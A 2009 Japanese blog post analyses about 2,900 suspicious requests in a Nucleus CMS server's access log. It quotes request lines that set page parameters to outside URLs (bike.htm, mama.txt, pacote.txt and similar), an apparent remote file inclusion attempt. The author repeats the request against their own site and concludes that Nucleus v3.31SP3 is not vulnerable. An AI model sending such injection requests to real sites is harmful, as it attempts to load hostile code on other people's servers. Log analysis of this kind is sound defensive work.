Nucleusにアタックが 1


Nucleus を動かしている webサーバーのアクセスログを見てみたら正常とは言えないアクセスを見つけた。
index.phpとそのほかの2ページに、2週間ほどの間に2900件のおかしなアクセスがあったのだ。
そのアクセスは
  GET /pg1.php?itemid=http://school.hostinginfive.com/bike.htm? HTTP/1.1
のような形式のものである。

アクセスを狙っているURLは
  http://bikelove.hostinginfive.com/bike.htm?
  http://servicepack.sppages.com/index.htm?
  http://bikelove.hostinginfive.com/bike.htm?
  http://mattd.100webspace.net/bike.htm?
  http://babycaleb.fortunecity.co.uk/index.htm?
  http://mattd.myhood.se/bike.htm?
  http://wiiman.t35.com/index.htm?
など。
少数だが
  http://babycaleb.fortunecity.co.uk/index.htm?
  http://www.abeleclairage.com/mama.txt???
もある。

マイナーなところでは veloxzone.com.br,vivax.com.brなど ブラジルから
  http://sons.moy.su/index.htm?
  http://www.pacote270178.xpg.com.br/pacote.txt?
  http://super2009.iespana.es/teste.txt?
さらに、dsl.tele.dkから
  http://man.43i.net/index.htm?
kabelbw.deからは
  http://servicepack.sppages.com/index.htm?
があった。


同様のアタックを自分で行ってみた。
http://stage5.8peaks.jp/index.php?special=http://stage5.8peaks.jp/

Webサーバーには、期待通り
GET /index.php?special=http://stage5.8peaks.jp/ HTTP/1.1
とLogが残った。
そのほか、一通りの組み合わせを試したが、Nucleus( v3.31SP3)では、エラー表示のページが表示されるか、そのグループのトップページがされ、このタイプの攻撃ではセキュリティホールにならないようだ。

さらに Nucleusにアタック 2 に続く

06 Feb, 2009 | mokimoc
« Prev item - Next Item »
---------------------------------------------

Comments



Leave comments

このアイテムは閲覧専用です。コメントの投稿、投票はできません。